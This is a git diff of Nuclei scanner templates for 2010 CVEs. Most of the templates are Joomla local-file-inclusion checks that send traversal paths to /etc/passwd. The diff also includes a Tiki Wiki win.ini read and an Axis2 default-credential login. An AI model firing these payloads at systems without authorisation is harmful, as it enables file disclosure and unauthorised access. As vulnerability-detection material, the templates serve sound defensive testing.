+0,0 @@ -id: CVE-2010-1718 - -info: - name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12282 - - https://www.cvedetails.com/cve/CVE-2010-1718 - - http://secunia.com/advisories/39521 - - http://web.archive.org/web/20210121195621/https://www.securityfocus.com/bid/39545/ - classification: - cve-id: CVE-2010-1718 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01 diff --git a/nuclei-templates/CVE-2010/cve-2010-1719.yaml b/nuclei-templates/CVE-2010/CVE-2010-1719.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1719.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1719.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1722.yaml b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1722.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1722.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml b/nuclei-templates/CVE-2010/CVE-2010-1871.yaml deleted file mode 100644 index 2377160816..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2010-1871 -info: - name: JBoss Seam 2 Code Execution - author: medbsq - severity: high -# - https://www.cvebase.com/cve/2010/1871 -requests: - - method: GET - path: - - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers-condition: and - matchers: - - type: word - words: - - "java.lang." - - "For input string: \"zie\"" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1878.yaml b/nuclei-templates/CVE-2010/CVE-2010-1878.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1878.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1878.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1952.yaml b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1952.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1952.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1953.yaml b/nuclei-templates/CVE-2010/CVE-2010-1953.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1953.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1953.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml b/nuclei-templates/CVE-2010/CVE-2010-1954.yaml deleted file mode 100644 index 92e25accb9..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2010-1954 - -info: - name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12287 - - https://www.cvedetails.com/cve/CVE-2010-1954 - - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/ - - http://www.exploit-db.com/exploits/12287 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-1954 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/15 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1957.yaml b/nuclei-templates/CVE-2010/CVE-2010-1957.yaml deleted file mode 100644 index bc73c2d14e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1957.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2010-1957 - -info: - name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12235 - - https://www.cvedetails.com/cve/CVE-2010-1957 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1957 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/16 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml b/nuclei-templates/CVE-2010/CVE-2010-1979.yaml deleted file mode 100644 index bd92fd237b..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2010-1979 - -info: - name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12088 - - https://www.cvedetails.com/cve/CVE-2010-1979 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1979 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-1983.yaml b/nuclei-templates/CVE-2010/CVE-2010-1983.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1983.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1983.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2033.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2033.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2035.yaml b/nuclei-templates/CVE-2010/CVE-2010-2035.yaml deleted file mode 100644 index 95076b9c42..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2035.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-2035 - -info: - name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34006 - - https://www.cvedetails.com/cve/CVE-2010-2035 - - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2035 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2050.yaml b/nuclei-templates/CVE-2010/CVE-2010-2050.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2050.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2050.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2128.yaml b/nuclei-templates/CVE-2010/CVE-2010-2128.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2128.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2128.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml deleted file mode 100644 index ac73172c1b..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2010-2259 - -info: - name: Joomla! Component com_bfsurvey - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2259 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2307.yaml b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2307.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2307.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2861.yaml b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2861.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2861.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2918.yaml b/nuclei-templates/CVE-2010/CVE-2010-2918.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2918.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2918.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2920.yaml b/nuclei-templates/CVE-2010/CVE-2010-2920.yaml deleted file mode 100644 index 4b9def58c4..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2920.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2010-2920 - -info: - name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12120 - - https://www.cvedetails.com/cve/CVE-2010-2920 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2920 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml deleted file mode 100644 index e305fa4fca..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2010-3426 - -info: - name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/14964 - - https://www.cvedetails.com/cve/CVE-2010-3426 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-3426 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml new file mode 100644 index 0000000000..3b556de705 --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-4239 + +info: + name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion + author: 0x_akoko + severity: high + description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion + reference: + - https://www.cvedetails.com/cve/CVE-2010-4239 + - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2010-4239 + cwe-id: CWE-20 + tags: cve,cve2010,tikiwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2010/cve-2010-4617.yaml b/nuclei-templates/CVE-2010/CVE-2010-4617.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-4617.yaml rename to nuclei-templates/CVE-2010/CVE-2010-4617.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-4769.yaml b/nuclei-templates/CVE-2010/CVE-2010-4769.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-4769.yaml rename to nuclei-templates/CVE-2010/CVE-2010-4769.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-5028.yaml b/nuclei-templates/CVE-2010/CVE-2010-5028.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-5028.yaml rename to nuclei-templates/CVE-2010/CVE-2010-5028.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-5278.yaml b/nuclei-templates/CVE-2010/CVE-2010-5278.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-5278.yaml rename to nuclei-templates/CVE-2010/CVE-2010-5278.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-5286.yaml b/nuclei-templates/CVE-2010/CVE-2010-5286.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-5286.yaml rename to nuclei-templates/CVE-2010/CVE-2010-5286.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-0219.yaml b/nuclei-templates/CVE-2010/cve-2010-0219.yaml new file mode 100644 index 0000000000..1599e7084c --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0219.yaml @@ -0,0 +1,53 @@ +id: CVE-2010-0219 + +info: + name: Apache Axis2 Default Login + author: pikpikcu + severity: high + description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 + - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - http://www.vupen.com/english/advisories/2010/2673 + classification: + cve-id: CVE-2010-0219 + metadata: + shodan-query: http.html:"Apache Axis" + tags: cve,cve2010,axis,apache,default-login,axis2 + +requests: + - raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + + payloads: + username: + - admin + password: + - axis2 + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + words: + - "

Welcome to Axis2 Web Admin Module !!

" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2010/cve-2010-0696.yaml b/nuclei-templates/CVE-2010/cve-2010-0696.yaml new file mode 100644 index 0000000000..b659158355 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0696.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-0696 + +info: + name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval + author: daffainfo + severity: high + description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/11447 + - https://www.cvedetails.com/cve/CVE-2010-0696 + - http://secunia.com/advisories/38587 + - http://www.joomlaworks.gr/content/view/77/34/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-0696 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-0944.yaml b/nuclei-templates/CVE-2010/cve-2010-0944.yaml new file mode 100644 index 0000000000..e3e41de5b4 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0944.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0944 + +info: + name: Joomla! Component com_jcollection - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11088 + - https://www.cvedetails.com/cve/CVE-2010-0944 + - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt + - http://www.exploit-db.com/exploits/11088 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0944 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-0972.yaml b/nuclei-templates/CVE-2010/cve-2010-0972.yaml new file mode 100644 index 0000000000..37c142f65b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0972.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-0972 + +info: + name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11738 + - https://www.cvedetails.com/cve/CVE-2010-0972 + - http://secunia.com/advisories/38925 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0972 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-0982.yaml b/nuclei-templates/CVE-2010/cve-2010-0982.yaml new file mode 100644 index 0000000000..a69166498d --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0982.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0982 + +info: + name: Joomla! Component com_cartweberp - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10942 + - https://www.cvedetails.com/cve/CVE-2010-0982 + - http://www.securityfocus.com/bid/37581 + - http://secunia.com/advisories/37917 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0982 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-0985.yaml b/nuclei-templates/CVE-2010/cve-2010-0985.yaml new file mode 100644 index 0000000000..614705c1c5 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0985.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-0985 + +info: + name: Joomla! Component com_abbrev - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10948 + - https://www.cvedetails.com/cve/CVE-2010-0985 + - http://www.securityfocus.com/bid/37560 + - http://osvdb.org/61458 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-0985 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1056.yaml b/nuclei-templates/CVE-2010/cve-2010-1056.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1056.yaml rename to nuclei-templates/CVE-2010/cve-2010-1056.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1217.yaml b/nuclei-templates/CVE-2010/cve-2010-1217.yaml new file mode 100644 index 0000000000..40edd4a34c --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1217.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1217 + +info: + name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + reference: + - https://www.exploit-db.com/exploits/11814 + - https://www.cvedetails.com/cve/CVE-2010-1217 + - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt + - http://www.securityfocus.com/bid/38866 + remediation: Apply all relevant security patches and product upgrades. + classification: + cve-id: CVE-2010-1217 + tags: cve,cve2010,joomla,lfi,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-1313.yaml b/nuclei-templates/CVE-2010/cve-2010-1313.yaml new file mode 100644 index 0000000000..8025cded39 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1313.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1313 + +info: + name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12082 + - https://www.cvedetails.com/cve/CVE-2010-1313 + - http://www.securityfocus.com/bid/39237 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1313 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1314.yaml b/nuclei-templates/CVE-2010/cve-2010-1314.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1314.yaml rename to nuclei-templates/CVE-2010/cve-2010-1314.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1469.yaml b/nuclei-templates/CVE-2010/cve-2010-1469.yaml new file mode 100644 index 0000000000..b8370e009c --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1469.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1469 + +info: + name: Joomla! Component JProject Manager 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12146 + - https://www.cvedetails.com/cve/CVE-2010-1469 + - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt + - http://www.exploit-db.com/exploits/12146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1469 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1470.yaml b/nuclei-templates/CVE-2010/cve-2010-1470.yaml new file mode 100644 index 0000000000..bf37563f9b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1470.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1470 + +info: + name: Joomla! Component Web TV 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12166 + - https://www.cvedetails.com/cve/CVE-2010-1470 + - http://secunia.com/advisories/39405 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1470 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1473.yaml b/nuclei-templates/CVE-2010/cve-2010-1473.yaml new file mode 100644 index 0000000000..02b9972d70 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1473.yaml @@ -0,0 +1,30 @@ +id: CVE-2010-1473 + +info: + name: Joomla! Component Advertising 0.25 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12171 + - https://www.cvedetails.com/cve/CVE-2010-1473 + - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt + - http://secunia.com/advisories/39410 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1473 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/cve-2010-1475.yaml b/nuclei-templates/CVE-2010/cve-2010-1475.yaml new file mode 100644 index 0000000000..bb3e999cac --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1475.yaml @@ -0,0 +1,29 @@ +id: CVE-2010-1475 + +info: + name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12147 + - https://www.cvedetails.com/cve/CVE-2010-1475 + - http://secunia.com/advisories/39285 + classification: + cve-id: CVE-2010-1475 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1495.yaml b/nuclei-templates/CVE-2010/cve-2010-1495.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1495.yaml rename to nuclei-templates/CVE-2010/cve-2010-1495.yaml diff 